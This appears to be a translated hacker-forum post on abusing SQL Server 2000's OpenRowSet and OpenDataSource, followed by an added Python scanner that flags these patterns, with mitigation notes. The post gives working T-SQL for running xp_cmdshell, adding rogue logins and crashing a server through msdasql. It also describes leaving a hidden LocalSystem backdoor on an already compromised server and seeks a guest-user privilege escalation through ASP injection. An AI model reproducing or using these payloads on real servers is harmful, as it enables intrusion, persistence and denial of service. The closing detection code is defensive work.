Next, I want to talk about some new SQL Server bugs. Although I have worked hard on these for a long time and was lucky to find them, I am afraid they may not be exclusive to me; I will leave it to you to judge.
1. About OpenRowSet and OpenDataSource
Maybe this technique has already been used: using OpenRowSet to run commands on the local server. Normally it is used (including in the MSDN columns) like this:
Select * From OpenRowSet('sqloledb', 'myserver';'sa';'', 'select * From table')
As you can see (even from the name), OpenRowSet is only meant as a quick way to access a remote database. It must be followed by a select, that is, a recordset must be returned.
So can we use it to call xp_cmdshell? The answer is yes!
Select * From OpenRowSet('sqloledb', 'server';'sa';'', 'set fmtonly off exec master.dbo.xp_cmdshell ''dir C:\''')
SET FMTONLY OFF must be added, because by default only column metadata is returned; with it, the result set produced by xp_cmdshell is handed back to the outer SELECT. With the default setting an empty set would come back, the outer SELECT would fail, and the command would not execute.
If we want to call sp_addlogin instead, it returns no result set the way xp_cmdshell does, so the fmtonly setting no longer helps. Instead, do the following:
Select * From OpenRowSet('sqloledb', 'server';'sa';'', 'select ''OK!'' exec master.dbo.sp_addlogin hectic')
This way the command returns at least the result of select 'OK!', so your machine will display OK!, and at the same time the remote database adds a login named hectic. In other words, we use the set returned by select 'OK!' to satisfy (spoof) the local select request, so the command executes normally. The same trick works with sp_addsrvrolemember and with OpenDataSource! As for what this method is really useful for, read on.
2. Two requests through msdasql
I wonder whether you have tried connecting to a remote database with msdasql. Of course, this call must be made by the SQL Server administrator, as shown below:
Select * From OpenRowSet('msdasql', 'driver={SQL Server};server=server;address=server,1433;uid=sa;pwd=;database=master;network=dbmssocn', 'select * From Table1 select * From Table2')
When Table1 and Table2 have different numbers of fields, you will find that the other party's SQL Server crashes, the local connection fails, and system resource usage stays normal. After killing the sqlserver process with pskill, unless you restart the machine, SQL Server either fails to start normally or frequently hits illegal operations. I just happened to find this bug and have not found the specific cause yet; strangely, it only occurs with msdasql, not with sqloledb. It does not seem to be a mismatch between the number of requested sets and the number of returned sets; it should be a problem in msdasql itself. Let's look for the specific cause together.
3. Terrible Backdoor
It used to be said on the Internet that a backdoor can be added to SQL Server by adding triggers or jobs, or by rewriting sp_addlogin and sp_addsrvrolemember. These methods work, but they are easily discovered. I wonder whether you have thought about the local connection mapping of sqloledb. For example, using the SQL Server administrator account, run the following command on the other party's SQL Server:
Select * From OpenRowSet('sqloledb', 'trusted_connection=yes;Data Source=hectic', 'set fmtonly off exec master..xp_cmdshell ''dir C:\''')
This establishes a local connection mapping named hectic on the other party's machine. As long as SQL Server is not restarted, the mapping persists, and at least I still don't know how to find a connection mapping left behind by someone else. Now, after running the command above, you will find that even a guest user with no permissions on SQL Server can run that same command! And it runs with LocalSystem permissions (default installation)! Haha! This method can be used to leave a backdoor on a SQL Server that has already been compromised and where administrator permissions have been obtained. The above method has been verified on SQL Server 2000 and SQL Server 2000 SP1!
Here is another guess. Have you noticed the two DSNs that Windows ships with by default? One is localserver and the other is msqi. Both are created to connect to SQL Server with the local administrator account. If the other party's SQL Server is started under a custom power user, then sa's permissions are just those of that power user and it is hard to get much further, but with the following command:
Select * From OpenRowSet('msdasql', 'dsn=localserver;trusted_connection=yes', 'set fmtonly off exec master..xp_cmdshell ''dir C:\''')
you should be able to connect to the local SQL Server with the Administrator account behind localserver and then run local commands with that account's permissions. From there I thought I should be able to break out of sa's power-user permissions. The problem is that sqloledb cannot use a DSN connection, while msdasql can only be called by the administrator. So I am looking for a way for guest to call msdasql.
If anyone knows how to get past this or has a new idea, let's discuss it together. If this bug can be used by guest, it will be a very serious security vulnerability, because any of the SQL statements mentioned above could be submitted through the other party's ASP pages for execution.
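A defender's view of the patterns above (the SET FMTONLY OFF trick from section 1, and the trusted_connection loopback and DSN variants from section 3): the following Python, added here as an example rather than code from the original post, scans captured T-SQL batches (for instance from a SQL trace) and flags OpenRowSet/OpenDataSource calls whose inner query reaches xp_cmdshell or the login procedures. The sample batches are constructed from the shapes shown above; the flag names and severity scale are this example's own assumptions.

```python
"""Flag T-SQL batches that use OPENROWSET/OPENDATASOURCE the way the post
describes: an ad hoc provider call whose inner query runs xp_cmdshell or a
login-management procedure, usually primed with SET FMTONLY OFF so the outer
SELECT accepts the result.  Input is a list of captured batches; every sample
batch below is constructed for this example."""
import re
from dataclasses import dataclass, field

# Procedures the post drives through the provider call (assumed watch list).
WATCHED_PROCS = ("xp_cmdshell", "sp_addlogin", "sp_addsrvrolemember")

AD_HOC_RE = re.compile(r"\b(openrowset|opendatasource)\s*\(", re.I)
FMTONLY_OFF_RE = re.compile(r"\bset\s+fmtonly\s+off\b", re.I)
PROC_RE = re.compile(r"\b(" + "|".join(WATCHED_PROCS) + r")\b", re.I)
# Provider-string fragments: the 'server';'login';'password' form or uid=/pwd=,
# Windows authentication (loopback), and a DSN reference.
INLINE_CRED_RE = re.compile(r"\b(uid|pwd)\s*=|'\s*;\s*'[^']*'\s*;\s*'[^']*'", re.I)
TRUSTED_RE = re.compile(r"trusted\s*_\s*connection\s*=\s*yes", re.I)
DSN_RE = re.compile(r"\bdsn\s*=", re.I)


@dataclass
class Finding:
    batch: str
    flags: list = field(default_factory=list)
    severity: str = "info"


def normalize(sql: str) -> str:
    """Collapse whitespace so multi-line batches match the same patterns."""
    return re.sub(r"\s+", " ", sql).strip()


def analyze_batch(sql: str) -> Finding:
    """Return the flags raised by one batch and a coarse severity."""
    text = normalize(sql)
    f = Finding(batch=text)
    if not AD_HOC_RE.search(text):
        return f  # no ad hoc provider call: out of scope for this check
    f.flags.append("ad_hoc_provider")
    if INLINE_CRED_RE.search(text):
        f.flags.append("inline_credentials")
    if TRUSTED_RE.search(text):
        f.flags.append("trusted_connection")
    if DSN_RE.search(text):
        f.flags.append("dsn_reference")
    if FMTONLY_OFF_RE.search(text):
        f.flags.append("fmtonly_off")
    procs = sorted({m.group(1).lower() for m in PROC_RE.finditer(text)})
    f.flags.extend("proc:" + p for p in procs)
    # A provider call that reaches a watched procedure is the post's pattern;
    # FMTONLY OFF or a loopback with Windows auth alone is still worth a look.
    if procs:
        f.severity = "high"
    elif "fmtonly_off" in f.flags or "trusted_connection" in f.flags:
        f.severity = "medium"
    else:
        f.severity = "low"
    return f


def scan(batches) -> list:
    """Analyze every batch and keep only those using an ad hoc provider call."""
    return [r for r in map(analyze_batch, batches) if "ad_hoc_provider" in r.flags]


# Constructed sample batches mirroring the shapes discussed in the post.
SAMPLE_BATCHES = [
    "SELECT name FROM master..sysdatabases",
    "SELECT * FROM OPENROWSET('sqloledb', 'myserver';'sa';'', 'SELECT * FROM table')",
    "SELECT * FROM OPENROWSET('sqloledb', 'server';'sa';'',\n"
    " 'set fmtonly off exec master.dbo.xp_cmdshell ''dir C:\\''')",
    "SELECT * FROM OPENROWSET('sqloledb', 'trusted_connection=yes; Data Source=hectic',\n"
    " 'set fmtonly off exec master..xp_cmdshell ''dir C:\\''')",
    "SELECT * FROM OPENROWSET('sqloledb', 'server';'sa';'',"
    " 'select ''OK!'' exec master.dbo.sp_addlogin hectic')",
    "SELECT * FROM OPENROWSET('msdasql', 'dsn=localserver; trusted_connection=yes',\n"
    " 'set fmtonly off exec master..xp_cmdshell ''dir C:\\''')",
]

if __name__ == "__main__":
    for r in scan(SAMPLE_BATCHES):
        print(f"[{r.severity:6}] {', '.join(r.flags)}\n         {r.batch}")
```

Run it directly to print the findings for the sample batches; in practice, feed it the statement text captured by a trace on the server. The enabling setting for all of these batches is ad hoc provider access: SQL Server 2000 restricts it per provider through the DisallowAdhocAccess registry value under the MSSQLServer\Providers key, and SQL Server 2005 and later expose it as the 'Ad Hoc Distributed Queries' option in sp_configure, which is off by default. With that access restricted, the provider call itself is refused, so the inner xp_cmdshell or sp_addlogin never runs.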